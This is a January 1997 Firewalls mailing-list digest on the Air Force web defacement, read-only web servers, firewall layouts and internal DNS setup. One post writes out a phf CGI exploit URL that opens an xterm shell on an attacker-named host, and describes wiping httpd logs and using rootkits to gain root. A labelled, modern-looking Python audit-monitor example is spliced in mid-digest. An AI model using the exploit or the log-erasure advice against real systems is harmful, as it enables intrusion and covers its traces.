RedHat 4.0 has a bootable 'live' Linux filesystem on CDROM. I've booted it on HP PC Vectras -- though the install itself doesn't work well if the CDROM was booted from, so I always boot from the floppy to do a RedHat 4.0 install.

Also the NT 4.0 installation CDROMs can be booted on certain supported CDROM drives ("El Cerrito" is one CDROM name I remember from the 4.0 beta).

HP also distributes a CDROM with diagnostic and RAID array tools for its enterprise server PCs (i.e. NetServer LS, etc.) called HP Navigator which is bootable on the NetServer CDROM drive.
- Morrow

From: long-morrow@CS.YALE.EDU
To: Firewalls@GreatCircle.COM, zeb@sbbs.se
Subject: Re: Air Force Web Site Hacked
Date: Thu, 2 Jan 1997 10:33:39 -0500 (EST)

Sebastian Stache wrote:

> I'm getting unnerved by the fact that not only
> have those sites indeed been hacked, but no one
> seems to be surprised.
>
> What techniques were used? To alter the html
> files, someone obviously managed to achieve
> file overwrite rights (at the very least).

You'd be surprised at how many NCSA httpd sites are still out there which are vulnerable to the attack:

    netscape 'http://www.victim.com/cgi-bin/phf?Qalias=x%0a/usr/bin/X11/xterm%20-display%20mydisplay.attacker.com:0'

Once you have an interactive shell (as an open window on your display) running at the userid the http server (httpd daemon) is running under, you can usually then overwrite the httpd logs in the logfile directory to erase any trace of your intrusion. Then you will often find that the htdocs subdirectory is either owned by you or that it has fairly liberal permissions.
And of course, once you are logged in on a machine you can bring over all of the hacker toolkits to automate breaking 'root' -- COPS, crack, "rootkit" (various exploit scripts), etc. Given enough time I'd give most intruders who have managed to login via telnet a pretty good chance ( > 50% ) of breaking maximum security on most Unix systems (i.e. gain 'root' privileges).

- Morrow

From: Rich Lenihan
To: Firewalls@GreatCircle.COM
Subject: Making a case for Firewall design
Date: Thu, 02 Jan 97 10:59:58 -0500

I'm trying to make a case for a firewall design. I've narrowed the choices down to two options.
Option A looks like:

   internal        internal        dual-homed            external
   network   ---   filtering  ---  bastion host with --- filtering  --- internet
                   router          TIS toolkit           router

Option B looks like:

   internal        internal        bastion host(s)       external
   network   ---   "firewall"            |               filtering  --- internet
                   system*   ---- DMZ network ----       router

*(Cisco PIX or similar device)

With both options, we would need to proxy or masquerade all internal connections to the internet (we use private IP addresses). I'm pretty sure both options would give us what we want (internet connectivity + security). The trade-offs I see are the lower cost of A (most of the pieces are already in place) vs. the ease of use and extensibility of B. My own preference is for option B but I'll need some backup before I can make a case for spending $10K+.

Has anyone else made or seen such a (third-party) analysis before? I have the O'Reilly Firewalls book but they don't really cover option B.

Thanks...

-Rich
--
Rich Lenihan
System/Network Administrator
rich@segue.com
617.796.1247 (voice)
617.796.1610 (fax)
Segue Software, Inc.
1320 Centre Street
Newton Centre, MA 02159 USA

From: "Mike O'Connor"
To: long-morrow@CS.YALE.EDU
Cc: Firewalls@GreatCircle.COM, zeb@sbbs.se
Subject: Re: Air Force Web Site Hacked
Date: Thu, 2 Jan 1997 11:46:48 -0500 (EST)

:>I'm getting unnerved by the fact that not only
:>have those sites indeed been hacked, but no one
:>seems to be surprised.
:>
:>What techniques were used? To alter the html
:>files, someone obviously managed to achieve
:>file overwrite rights (at the very least).
:
:You'd be surprised at how many NCSA httpd sites are
:still out there which are vulnerable to the attack:

[more about the phf bug]

There's no reason to believe that the compromise to www.af.mil occurred through any weakness in the WWW server software/machine in particular. I just did some cursory checking -- "server.af.mil" is running sendmail 5.59(!) and "ddn.af.mil" is running NFS (no exports list, perhaps a default portmap though). And it could always be an inside job...

...Mike

--
Michael J. O'Connor
mjo@dojo.mi.org
"...and life begins at 40 -- so they promise" -John Lennon

From: "Caldwell, Matt COLASC"
To: firewalls@GreatCircle.COM, owl@owlsnest.com
Subject: RE: Is Your Website a Secret?
Date: Thu, 2 Jan 1997 11:52:00 -0500

----------
From: owl@owlsnest.com
To: firewalls@GreatCircle.COM
Subject: Is Your Website a Secret?
Date: Tuesday, December 31, 1996 9:22PM

Is your web site the best kept secret on the Internet? We'll promote it to 50 search engines and indexes for $85 and complete the job in 2 business days. Satisfaction is guaranteed!

SPAM DELETED

Matt Caldwell - Security / Unix Administrator
---------------------------------------------
NCR / Mosaic Computing Inc.
matt.caldwell@columbiasc.ncr.com
matt.caldwell@mosaic-comp.com
Office: 803-939-2322
---------------------------------------------

From: "Hicks, Rick"
To: Firewalls List
Subject: RE: DNS Proxy and Internal Root Name Ser
Date: Thu, 2 Jan 1997 11:25:00 -0600

>>Problem:
>>One problem I thought of concerns the mitigation between the internal
>>root name server and the forwarders/slave lines. If a subordinate
>>domain name server queries the root name server for an "outside" domain,
>>how would it know to forward the query to the proxy (being that it is an
>>internal root name server)? I could have my subordinate top-level
>>domain name servers query the proxy directly by putting a forwarders line
>>in its /etc/named.boot, however, this would bypass the internal root
>>structure. It seems to be straightforward w/o an internal root name
>>server, however, I need to maintain these root name servers. Can anyone
>>help.
>The problem with an internal root server is that it won't take any account
>of your forwarders & slave options because it is said to be a root server.
>The only solution I can think of is adding the noforward patch in the named
>daemons of the first level name servers you have under your root server.
>You just have to specify all the domains known by your internal root
>nameserver so that your lower level nameserver would query it but would
>forward to your proxy for everything else.

The solution to both of these issues is to have a host running as your internal *root* nameserver, and NOTHING else. The root only needs to have references to hosts that are authoritative for the domain(s); they do not need to be, or should be, nameservers for a domain. This way your internal servers will believe that they are authoritative for the domain, but still forward unresolvable queries to the *forwarders* host. The forwarders host should be the *firewall* running as a primary, secondary, or caching server (if your upstream provider is authoritative for your zone) with a true root.db to resolve external hosts.

This works quite well, as I have been doing it for almost a year without problems.
Rick
________________________________________________
Rick Hicks
Systems Specialist
Hussmann Corporation
rhicks@hussmann.com
http://www.hussmann.com

From: Don Flint
To: rich@segue.com
Cc: firewalls@greatcircle.com
Subject: RE: Making a case for Firewall design
Date: Thu, 02 Jan 1997 13:04:21 -0500

>>Reply to your message of 1/2/97 12:42 PM
>>
>>I'm trying to make a case for a firewall design. I've narrowed the choices
>>down to two options. Option A looks like:
>>
>>   internal        internal        dual-homed            external
>>   network   ---   filtering  ---  bastion host with --- filtering  --- internet
>>                   router          TIS toolkit           router
>>
>>option B looks like:
>>
>>   internal        internal        bastion host(s)       external
>>   network   ---   "firewall"            |               filtering  --- internet
>>                   system*   ---- DMZ network ----       router
>>
>>*(Cisco PIX or similar device)
>>
>>With both options, we would need to proxy or masquerade all internal
>>connections to the internet (we use private IP addresses). I'm pretty sure
>>both options would give us what we want (internet connectivity + security).
>>The trade-offs I see are the lower cost of A (most of the pieces are already
>>in place) vs. the ease of use and extensibility of B. My own preference is
>>for option B but I'll need some backup before I can make a case for spending
>>$10K+.
>>
>>Has anyone else made or seen such a (third-party) analysis before? I have
>>the O'Reilly Firewalls book but they don't really cover option B.

Rich:

Have you thought about some of the other commercial products rather than just the TIS toolkit or the router/DMZ approach? There are several very good ones produced for a variety of platforms. Price has always been an objection, but now many of them are available for the same cost as the range you mentioned for the router/DMZ. They offer improved security over the router/DMZ approach as well.

Whatever route you decide to go, best of luck.

Don Flint

From: Rachel Rosencrantz
To: Firewalls@GreatCircle.COM
Subject: read only disks
Date: Thu, 2 Jan 1997 13:14:28 -0500 (EST)

Firewalls-Digest said:

> From: "Jason T. Luttgens"
> Subject: RE: Air Force Web Site Hacked
>
> I do think read-only media is an interesting idea, by the way :) Dale is
> right though, there are still vulnerabilities.
> Personally, I like the idea
> of marking the files immutable myself. This way, even root can't change the
> content unless the machine is brought down into single-user mode. Not sure
> how many other operating systems support this other than (the great) BSDI
> though.
>

I think that pretty much all OS's should have the read-only option on mounting file systems. CD-ROMs usually like you to mount them read only. However, if one can break into root the disk could be unmounted and mounted without shutting down. If the system was also taking in data (such as forms input, and of course the access logs) one could put that data on a read-write file system. This does not remove the underlying problem that these break-ins point to, but it might make it slightly harder to make it publicly visible that someone was caught with their proverbial pants down.

Now the ideal thing from the read-only perspective (if you thought this was a way to go) would be if there was some device that was only writable in a special machine (like a CD-ROM) but could be rewritten (like a disk) by that machine. Then you could have the read-only information mounted from the device that can only read it, and when the web master wanted to modify it they could unmount it, pop it in the modification machine, make the changes, and re-mount it. (Actually you'd probably want 2 copies of the "disk". One would be in the mod machine (not on the net) and could make it easy to sit down and make the changes, and once they are finished the disks could be swapped (the second one updated) and there would be a minimum of web page down time.) My understanding of CDs is that they wouldn't work this way since the data is more "etched" in the disk, somewhat like a record.
-Rachel

From: "Caldwell, Matt COLASC"
To: Jim Truitt, Paul Ferguson
Cc: firewalls@GreatCircle.COM
Subject: Security Administrators: Web of Trust
Date: Thu, 2 Jan 1997 13:35:00 -0500

----------
From: Jim Truitt
To: Paul Ferguson
Cc: firewalls@GreatCircle.COM
Subject: Re: Denial of service (was Re: Air Force Web Site Hacked)
Date: Wednesday, January 01, 1997 3:32PM

[snip]
>So, what can you do? Log, log, log. And more logging. And get
>to know the security administrator upstream from you.
>
>- paul
[snip]

This is simple, but excellent advice. Users of PGP are always talking about a "web of trust". Perhaps what is needed is a web of trust between security admins. Just a thought.

Jim Truitt

Maybe what we need is our own group that promotes trust between each other and lets us get together as professionals, or a web site etc..

From: "Hicks, Rick"
To: Jean-Francois ZWOBADA, Firewalls List
Subject: RE: DNS Proxy and Internal Root Name Ser
Date: Thu, 2 Jan 1997 13:19:00 -0600

>Sorry... That's probably due to my poor English but I must confess I missed
>something in your explanation... "The root only needs to
>>have references to hosts that are authoritative for the domain(s), they
>>do not need to be, or should be, nameservers for a domain."
>What do you mean exactly?

I guess I should explain the assumptions I made. I assumed that you have internal nameservers for your domain that are not listed as authoritative with InterNIC. I also assumed that you have already set up an internal *root* nameserver situation that will spoof the internal servers into believing that they are authoritative for the domain even though they cannot, or you don't want them to, communicate with true Internet root nameservers. What I have just explained is what I and many other people have set up.
The difference I saw was this: You are using your internal *root* nameserver to resolve queries. The internal *root* should not have host data in it and should not be used to resolve names. It should run with references to the internal nameservers and be listed in these internal nameservers' root.db (or root.cache) file. No client should be using it for name resolving; they should use the other nameservers that you have set up as primary and secondaries.

If my assumptions are incorrect let me know. Also, it may be that you have confused the terms 'root' and 'primary' when it comes to nameservers. Please check to see that this is not the case.

Rick
________________________________________________
Rick Hicks
Systems Specialist
Hussmann Corporation
rhicks@hussmann.com
http://www.hussmann.com

From: Matthew Thompson
To: 'Brian Stone'
Cc: firewalls@GreatCircle.COM
Subject: RE: Air Force Web Site Hacked -Reply
Date: Sat, 4 Jan 1997 09:42:42 +1300

The standard's called El Torito, bootable CD-ROM. It requires PC BIOS support; many newer PCs support this, and you can add an Adaptec card and SCSI CD-ROM to an older PC for this support. Windows NT4 is probably the most common example of a PC bootable CD-ROM available today.

NT and Unix can be placed in ROM, but I'd suspect most implementations create a ramdisk for temporary use, and it still does not stop someone modifying programs in RAM (buffer overruns etc).
However, facing an almost totally read-only machine, running nothing but a webserver, would probably make many crackers go away and look for a softer target.

You could also automate monitoring of the audit log, and murder any processes which start writing, or attempting to write, in areas they shouldn't (including the RO file systems) and/or initiate a system shutdown or restart in this instance. Most people I'm sure would rather have a webserver off the air than full of kiddy porn...

>Compaq Corp. provides a bootable "Smart Start" OS installation CD with
>every Proliant 5000 (many people are using these as
>Netware/IntranetWare or NT file/print/app/web servers). I'm not sure
>how they do it, I believe it's a function of the BIOS that "knows" about the
>CD as a bootable media (probably searches A:, C:, D: etc. for boot files) if
>nothing is in A: and the hard disk isn't partitioned/formatted yet it boots
>from the CD and steps you through installing the rest of the drivers (hard
>drive/NIC/etc.) and the OS you purchased! It's cool and I think they've
>been doing it for awhile.
>Brian Stone
>bstone@KnowledgeSoft.com

>>>> Gene Lee 12/31/96 04:00pm >>>
>On Tuesday, December 31, 1996 2:41 PM, Mark
>Johnson[SMTP:mark@hercules.reno.nv.us] wrote:
>>I have not set one up yet (planned for July), but I believe you can have
>>a totally CDROM machine, at least using Novell or NT. Bootable CDROMs
>>and all data on CDROM so you would not have any writable media.
>>
>>Can anyone confirm or deny my thoughts?
>Slackware Linux has a usable filesystem on CD-ROM, however the boot
>partition still has to be HD or Floppy. One thing that puzzles me about
>bootable media is if you have a bootable CD, how does it install the
>drivers for itself to read from the CD to actually start reading the boot
>sector (which supposedly is on the CD). Kind of a Catch-22. Forgive me,
>but I'm no PC guru...
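One way to automate the audit-log monitoring Matthew suggests, as an added example that is not from any list post: it reads a constructed, simplified audit record format (assumed for this example, not any real BSM or syslog layout), treats any write attempt outside an allowed set of writable paths as grounds to kill the process, and escalates a mount/umount/mknod call to a host shutdown because at that point the read-only protection itself can no longer be trusted. Paths are normalised first so a "../" escape out of a writable directory is not waved through.

```python
import posixpath
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Constructed record format for this example (one event per line):
#   <epoch> pid=<n> uid=<n> call=<syscall> path=<path> result=ok|denied
# A real audit trail would be mapped into AuditEvent by its own parser.
RECORD_RE = re.compile(
    r"^(?P<ts>\d+) pid=(?P<pid>\d+) uid=(?P<uid>\d+) call=(?P<call>\w+) "
    r"path=(?P<path>\S+) result=(?P<result>ok|denied)$"
)

# Calls that modify a file; a *denied* attempt is still a signal worth acting on.
WRITE_CALLS = {"open_w", "creat", "unlink", "rename", "truncate", "chmod", "chown"}
# Calls that could undo the read-only setup itself (remount RW, new device node).
REMOUNT_CALLS = {"mount", "umount", "mknod"}
# The only places the web server may legitimately write (logs, form input, scratch).
WRITABLE_PREFIXES = ("/var/log/httpd/", "/var/spool/forms/", "/tmp/")


@dataclass(frozen=True)
class AuditEvent:
    ts: int
    pid: int
    uid: int
    call: str
    path: str
    denied: bool


@dataclass(frozen=True)
class Action:
    kind: str      # "kill" (one process) or "shutdown" (whole host)
    pid: int
    reason: str


def parse_record(line: str) -> Optional[AuditEvent]:
    """Parse one audit line; return None for lines that do not match the format."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    return AuditEvent(int(m["ts"]), int(m["pid"]), int(m["uid"]),
                      m["call"], m["path"], m["result"] == "denied")


def is_permitted_write(path: str) -> bool:
    """True only if the normalised path lies under a writable prefix, so
    '/var/log/httpd/../../etc/passwd' is rejected rather than matched."""
    clean = posixpath.normpath(path)
    return clean.startswith(WRITABLE_PREFIXES)


def evaluate(lines: Iterable[str]) -> List[Action]:
    """Apply the policy to audit lines and return the responses, in order.
    Each pid gets at most one action; a remount-class call escalates to
    shutdown regardless of who issued it."""
    actions: List[Action] = []
    handled = set()
    for line in lines:
        ev = parse_record(line)
        if ev is None or ev.pid in handled:
            continue
        if ev.call in REMOUNT_CALLS:
            actions.append(Action("shutdown", ev.pid,
                                  f"{ev.call} on {ev.path} by uid {ev.uid}"))
            handled.add(ev.pid)
        elif ev.call in WRITE_CALLS and not is_permitted_write(ev.path):
            status = "denied" if ev.denied else "succeeded"
            actions.append(Action("kill", ev.pid,
                                  f"{ev.call} on {ev.path} ({status})"))
            handled.add(ev.pid)
    return actions


# Constructed sample audit trail: a normal log write, a read, a blocked attempt
# to overwrite a page (plus a '..' variant), a remount by root, a scratch file.
SAMPLE_AUDIT_LOG = """\
852220800 pid=314 uid=60001 call=open_w path=/var/log/httpd/access_log result=ok
852220801 pid=314 uid=60001 call=read path=/usr/local/htdocs/index.html result=ok
852220802 pid=421 uid=60001 call=open_w path=/usr/local/htdocs/index.html result=denied
852220803 pid=421 uid=60001 call=open_w path=/var/log/httpd/../../../usr/local/htdocs/index.html result=denied
852220804 pid=500 uid=0 call=mount path=/usr/local/htdocs result=ok
852220805 pid=333 uid=60001 call=creat path=/tmp/sess_ab12 result=ok
"""

if __name__ == "__main__":
    for act in evaluate(SAMPLE_AUDIT_LOG.splitlines()):
        print(f"{act.kind:8} pid={act.pid}: {act.reason}")
```

Wiring the returned actions to kill(2) and to the platform's shutdown command is left to the deployment; the point here is the decision logic and the path normalisation.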
From firewalls-owner Thu Jan 2 12:04:22 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA17756 for firewalls-outgoing; Thu, 2 Jan 1997 10:37:43 -0800 (PST)
Received: from hermes.cu-online.com (hermes.cu-online.com [205.198.248.82]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA17723 for ; Thu, 2 Jan 1997 10:37:27 -0800 (PST)
Received: from argus.cu-online.com (argus.cu-online.com [206.185.2.72]) by hermes.cu-online.com (8.7.5/8.7.5-cuo-s6) with SMTP id MAA06910 for ; Thu, 2 Jan 1997 12:41:26 -0600 (CST)
Received: by argus.cu-online.com (SMI-8.6/SMI-SVR4) id MAA21415; Thu, 2 Jan 1997 12:41:29 -0600
Date: Thu, 2 Jan 1997 12:41:29 -0600
From: mcnabb@argus.cu-online.com (Paul McNabb)
Message-Id: <199701021841.MAA21415@argus.cu-online.com>
To: Firewalls@GreatCircle.COM
Subject: Read-only Web Site (was AF hack)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

There has been some discussion of putting a web site on read-only media to protect it against attack, with the drawback being that updating the web site becomes tedious. Three solutions have been proposed: 1) using the immutable bit (for BSD only), 2) using CDROM, and 3) using READ-ONLY file systems.

There is another solution that is being used by some sites, namely using mandatory access control (MAC) security. Here's what we have done for customers:

The web server has two network connections, but has IP forwarding disabled. Processes coming in from one network see all file systems as read-only (making /tmp RO is an option), and there is no mechanism for bypassing that, even if the process is root. All device special files are completely inaccessible to all processes and all users -- also mknod(2) is disabled.
If a user comes in from the other network, he/she can access the system normally, except that UID 0 (root) is treated as a normal account in terms of OS privilege, so attacks from this direction are also more tightly controlled (special programs are provided to manage the system instead of using a special account such as root).

                     +------------+
    <-------------->|  Secured   |<-------------->
    internal network | Web Site   | Internet/PublicNet
   (RW file systems) +------------+ (RO file systems)

When a Solaris host (x86 or SPARC) has been updated with this level of security, you can still use the r* commands, telnet, ftp, and even NFS from either side. You can have the RO restriction be done on a per-file basis as well, so you can be creative about your setup.

BTW, I've seen a number of heated messages about the usefulness of Orange Book security in relation to the "real world". The above is an example of Orange Book security available on a late-release OS (Solaris 2.4 and Solaris 2.5.1), evaluated to B1 and C2 (the C2 is quite enhanced from the minimum requirements mentioned in the TCSEC), with Solaris 2.6 planned for summer (it should finish its evaluation by the end of the year as well). There IS a lot of Orange Book trash on the market -- stuff that is old, hard to use, and of questionable usefulness in the real world. But it IS possible to build state-of-the-art, flexible, feature-rich, affordable, evaluated systems. Other companies have also built trusted systems, and users of those systems can comment on their experiences. The old IBM/TIS Trusted Xenix is a very bad example of a trusted system. It reflects the state of technology in the late 1980's, not a modern system.

I agree that if a box is a pure firewall, with no services of any kind being offered, then the addition of B-level security is of minor (but not zero) importance.
The instant the firewall system is accessible directly, for example as a web site or for admin purposes, B-level security can be extremely powerful.

paul
------------------------------------------------------------
Paul McNabb                     Argus Systems Group, Inc.
Vice President and CTO          1405A East Florida Avenue
mcnabb@argus.cu-online.com      Urbana, IL 61801 USA
TEL 217-384-6300                FAX 217-384-6404
"Securing the Future"
------------------------------------------------------------

From firewalls-owner Thu Jan 2 12:06:41 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA25404 for firewalls-outgoing; Thu, 2 Jan 1997 11:55:10 -0800 (PST)
Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA25397 for ; Thu, 2 Jan 1997 11:55:02 -0800 (PST)
Received: by dtcro002.apogee-com.fr; id UAA08358; Thu, 2 Jan 1997 20:55:20 +0100 (MET)
Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (3.2) id xma008356; Thu, 2 Jan 97 20:54:54 +0100
Received: from ingpc001.apogee-com.fr by (4.1/SMI-4.1) id AA28208; Thu, 2 Jan 97 20:52:14 +0100
Message-Id: <3.0.32.19970102205311.00723d5c@apogee1.apogee-com.fr>
X-Sender: jfzw@apogee1.apogee-com.fr
X-Mailer: Windows Eudora Pro Version 3.0 Demo (32)
Date: Thu, 02 Jan 1997 20:53:12 +0100
To: firewalls@greatcircle.com
From: Jean-Francois ZWOBADA
Subject: RE: DNS Proxy and Internal Root Name Ser
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 13:19 02/01/1997 -0600, you wrote:
>I guess I should explain the assumptions I made. I assumed that you have
>internal nameservers for your domain that are not listed as
>authoritative with InterNIC.
>I also assumed that you have already set up
>an internal *root* nameserver situation that will spoof the internal
>servers into believing that they are authoritative for the domain even
>though they cannot, or you don't want them to, communicate with true
>Internet root nameservers. What I have just explained is what I and many
>other people have set up.
>
>The difference I saw was this: You are using your internal *root*
>nameserver to resolve queries. The internal *root* should not have host
>data in it and should not be used to resolve names. It should run with
>references to the internal nameservers and be listed in these internal
>nameservers' root.db (or root.cache) file. No client should be using it
>for name resolving; they should use the other nameservers that you have
>set up as primary and secondaries.
>
>If my assumptions are incorrect let me know.
>
>Also, it may be that you have confused the terms 'root' and 'primary'
>when it comes to nameservers. Please check to see that this is not the
>case.
>
>
>Rick
>

Well let me explain my solution:

I assumed that the root name server was needed for linking different internal domains. I have an internal root nameserver and internal nameservers. These servers have a db.cache pointing to the internal root nameserver. And clients send queries to these servers. These nameservers need to ask the root for other internal domains but they also need to resolve Internet names. I don't want my internal root server to forward these queries to the outside, 'cause it can't since it's a root server (I mean that it ignores a forwarders & slave configuration). So my nameservers need to ask someone else for Internet names: my firewall. To let them decide between asking the internal root or the firewall, I need to add something, since a 'forwarders' line overrides everything (a father name server, a child, ...). That's why I use the patch.

I was really confused by your explanation and I am still quite confused...
:o) I don't see why your solution solves the problem... Don't get angry, please :o)

Thank you very much

Jean-Francois

From firewalls-owner Thu Jan 2 12:08:45 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA23092 for firewalls-outgoing; Thu, 2 Jan 1997 11:34:55 -0800 (PST)
Received: from cat.bbsr.edu (cat.bbsr.edu [198.116.91.161]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA23084 for ; Thu, 2 Jan 1997 11:34:41 -0800 (PST)
Message-Id: <199701021934.LAA23084@miles.greatcircle.com>
Received: from [198.168.1.45] by cat.bbsr.edu (SMTPD32-3.00) id AD3B64B1012C; Thu Jan 02 15:32:11 1997
From: "Jamie Thain"
To:
Subject: NT NAT
Date: Thu, 2 Jan 1997 15:30:38 -0400
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

To All,

There is now an NT NAT. http://www.on.com.
regards:jamie

From firewalls-owner Thu Jan 2 12:43:58 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA28304 for firewalls-outgoing; Thu, 2 Jan 1997 12:26:22 -0800 (PST)
Received: from loach.cichlid.com (loach.cichlid.com [165.227.20.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA28286 for ; Thu, 2 Jan 1997 12:26:07 -0800 (PST)
Received: (from news@localhost) by loach.cichlid.com (8.7.4/8.7.3) id MAA03247; Thu, 2 Jan 1997 12:22:24 -0800
To: firewalls@GreatCircle.COM
Path: cichlid
From: owner-fw-1-mailinglist@us.checkpoint.com
Newsgroups: mail.firewalls
Subject: None
Date: 2 Jan 1997 12:22:23 -0800
Lines: 39
Message-ID: <5ah5dv$cci@cichlid.cichlid.com>
NNTP-Posting-Host: cichlid.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk
Message-ID: <6d2b7519a936fe1a@deliver.cichlid.com>
Lines: 29
Xdeliver: processed on Thu Jan 2 12:22:19 PST 1997
Xdeliver: SENDER owner-fw-1-mailinglist@us.checkpoint.com
Xdeliver: to
Xdeliver: cc
Xdeliver: apparent_to
Xdeliver: from owner-fw-1-mailinglist@us.checkpoint.com
X-Nvlenv-01Date-Transferred: 2-Jan-1997 13:38:31 -0500; at DMZL1.NAVL
X-Nvlenv-01Date-Posted: 02-Jan-1997 13:41:27 -0500; at COMM2.NAVL
From: MBARASCH@navl.com (Mike Barasch)
To: FW-1-MAILINGLIST@us.checkpoint.com
Date: 02 Jan 97 13:41:00 EST
Subject: License #
Message-Id: <"<79FCC332816F2D79>79FCC332816F2D79@COMM2.NAVL"@-SMF->
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Sender: owner-fw-1-mailinglist@us.checkpoint.com
Precedence: bulk

I have Win NT 4.0 with Checkpoint 2.1c with 250 user license. Every time I restart my firewall I receive a message in the Event viewer on NT that says FW1: FW-1 only 256 internal hosts allowed. My firewall seems to be working fine; does this message indicate that I have more than 256 IP hosts on the network? How can I tell how many IP addresses the firewall can detect?

Thanks!
Mike Barasch
North American Van Lines

From firewalls-owner Thu Jan 2 13:57:16 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA01960 for firewalls-outgoing; Thu, 2 Jan 1997 12:54:51 -0800 (PST)
Received: from smartwall.v-one.com (smartwall.v-one.com [206.205.89.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA01869 for ; Thu, 2 Jan 1997 12:54:15 -0800 (PST)
Received: by smartwall.v-one.com; id PAA16481; Thu, 2 Jan 1997 15:50:35 -0500 (EST)
Received: from nt_fs1.v-one.com(198.69.135.3) by smartwall.v-one.com via smap (V3.1.1) id xma016468; Thu, 2 Jan 97 15:50:20 -0500
Received: by nt_fs1.V-ONE.COM with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF8C5.50252D00@nt_fs1.V-ONE.COM>; Thu, 2 Jan 1997 15:55:01 -0500
Message-ID:
From: "McMahan, Peg"
To: "'Jim Truitt'" , "'Paul Ferguson'" , "'Caldwell, Matt COLASC'"
Cc: "'firewalls@GreatCircle.COM'"
Subject: RE: Security Administrators: Web of Trust
Date: Thu, 2 Jan 1997 15:55:01 -0500
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>----------
>From: Caldwell, Matt COLASC[SMTP:caldwm@msgate.ColumbiaSC.NCR.COM]
>Sent: Thursday, January 02, 1997 1:35 PM
>To: Jim Truitt; Paul Ferguson
>Cc: firewalls@GreatCircle.COM
>Subject: Security Administrators: Web of Trust
>
>[snip]
>>So, what can you do? Log, log, log. And more logging. And get
>>to know the security administrator upstream from you.
>>
>>- paul
>[snip]
>
>This is simple, but excellent advice. Users of PGP are always talking about
>a "web of trust". Perhaps what is needed is a web of trust between security
>
>Maybe what we need is our own group that promotes trust between each
>other and lets us get together as professionals. or a web site etc..

This seems rather unlikely to me...
I'm an admin, have been an admin for quite some time, and while I do get to know and trust people, I would NOT trust my systems to anyone else, nor put my trust in anyone's systems... Just because you trust someone doesn't mean they're NOT a dumbass. Trust is (to me anyway) a very very bad word when it comes to security issues. Promoting trust is one thing, but personally I think it's best to be as paranoid as possible, as often as possible. Getting together and trusting each other can only go so far. I can see getting to know the people upstream from you, but that doesn't mean that someone else on that site isn't on the shifty side of things... Paranoia seems like the best option to me.

>
>admins. Just a thought.
>
>Jim truitt
>

  /~~\/~~\/~~\/~~\/~~\/~~\
 | /\/ /\/ /\/ /\/ /\/ /\ |   peg@v-one.com
 | \/ /\/ /\/ /\/ /\/ /\/ |   www.v-one.com
  \ \/\ \/\ \/\ \/\ \/\ \/
  /\ \/\ \/\ \/\ \/\ \/\ \    Systems Engineer
 | /\/ /\/ /\/ /\/ /\/ /\ |   1803 Research Blvd
 | \/ /\/ /\/ /\/ /\/ /\/ |   Rockville, MD 20850
  \__/\__/\__/\__/\__/\__/    (301)838-8900 x 224

From firewalls-owner Thu Jan 2 14:09:40 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA03851 for firewalls-outgoing; Thu, 2 Jan 1997 13:13:34 -0800 (PST)
Received: from csc.com (explorer.csc.com [20.1.10.27]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA03827 for ; Thu, 2 Jan 1997 13:13:24 -0800 (PST)
Received: from sdfpc2.gsfc.nasa.gov by csc.com with smtp (Smail3.1.29.1 #1) id m0vfuRK-001AdXC; Thu, 2 Jan 97 16:12 EST
Message-ID: <32CC5118.5FB8@csc.com>
Date: Thu, 02 Jan 1997 16:21:44 -0800
From: Adam Safier
Reply-To: asafier@csc.com
Organization: Computer Sciences Corp.
X-Mailer: Mozilla 3.0 (Win16; U)
MIME-Version: 1.0
To: Firewalls@GreatCircle.COM
Subject: Re: DNS Proxy and Internal Root Name Server
References: <199701020900.BAA15175@miles.greatcircle.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I'm missing something in this DNS discussion. Don't make the internal "root" a root, make it your "main" DNS server with a limited cache file. You set the "main" internal DNS server to act as a recursive resolver for all internal DNS servers. Point it only to the external DNS server which can also act as a recursive resolver. All internal DNS servers point to the internal "main" server only using forwarder/slave lines.

External queries are recursively resolved by your "main" DNS server which can pass through the firewall and has forwarder/slave lines pointing to the external DNS server. The answers are received by the external server, forwarded to the "main" server and then forwarded to internal slave DNS servers or actual workstations. There is no need for the other internal DNS servers to see your proxy or external DNS server.

Internet---DNS external recursive resolver----FW----DNS main recursive resolver
                                                              |
                                          Other DNS servers only point to DNS main
                                          and use recursive queries.

(P31, 143 in O'Reilly)

Adam

JF wrote:
> Date: Thu, 02 Jan 1997 09:03:03 +0100
> From: Jean-Francois ZWOBADA
> Subject: Re: DNS Proxy and Internal Root Name Server
>
> At 16:59 31/12/1996 -0500, R. McMahon wrote:
